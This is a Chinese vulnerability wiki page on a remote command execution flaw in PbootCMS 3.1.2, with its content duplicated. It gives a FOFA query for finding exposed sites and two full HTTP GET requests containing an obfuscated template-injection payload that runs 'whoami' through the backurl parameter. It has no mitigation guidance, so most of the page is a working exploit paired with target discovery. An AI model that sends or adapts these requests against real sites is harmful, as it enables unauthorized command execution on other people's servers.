fofamini-wiki

登录白背景

源码

PbootCMS pboot存在远程命令执行漏洞

一、漏洞简介

PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。在PbootCMS V3.1.2版本中存在RCE漏洞导致攻击者可利用该漏洞远程执行命令。

二、影响版本

PbootCMS 3.1.2

三、资产测绘

fofaapp="PBOOTCMS"
特征

四、漏洞复现

GET /index.php/keyword?keyword=}{pboot:if((get_lg/*-*/())/**/(get_backurl/*-*/()))}{/pboot:if}&backurl=;whoami HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Accept: */*
Accept-Language: en
Cookie: lg=system; PbootSystem=blr2stdputphajekcor68ii671;
Accept-Encoding: gzip, deflate

GET /?snakin=}{pboot:if((get_lg/*-*/())/**/(get_backurl/*-*/()))}{/pboot:if}&backurl=;whoami HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1
Connection: close
Accept: */*
Accept-Language: en
Cookie: lg=system; PbootSystem=blr2stdputphajekcor68ii671;
Accept-Encoding: gzip, deflate

原文: https://www.yuque.com/xiaokp7/ocvun2/lv4hs2nvspbo7wvr

# PbootCMS pboot存在远程命令执行漏洞

# 一、漏洞简介
PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。在PbootCMS V3.1.2版本中存在RCE漏洞导致攻击者可利用该漏洞远程执行命令。

# 二、影响版本

- PbootCMS 3.1.2

# 三、资产测绘

- fofa`app="PBOOTCMS"`
- 特征

![image.png](./img/r4ArhLum466O1Whu/1712592374685-0024fa69-8474-444a-8609-5a27dedffdd8-955155.png)

# 四、漏洞复现
```java
GET /index.php/keyword?keyword=}{pboot:if((get_lg/*-*/())/**/(get_backurl/*-*/()))}{/pboot:if}&backurl=;whoami HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Accept: */*
Accept-Language: en
Cookie: lg=system; PbootSystem=blr2stdputphajekcor68ii671;
Accept-Encoding: gzip, deflate

```
![image.png](./img/r4ArhLum466O1Whu/1712595691939-3b775c80-947a-4a6b-89b4-8d9fef97e5c5-014927.png)
```java
GET /?snakin=}{pboot:if((get_lg/*-*/())/**/(get_backurl/*-*/()))}{/pboot:if}&backurl=;whoami HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1
Connection: close
Accept: */*
Accept-Language: en
Cookie: lg=system; PbootSystem=blr2stdputphajekcor68ii671;
Accept-Encoding: gzip, deflate
```

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lv4hs2nvspbo7wvr>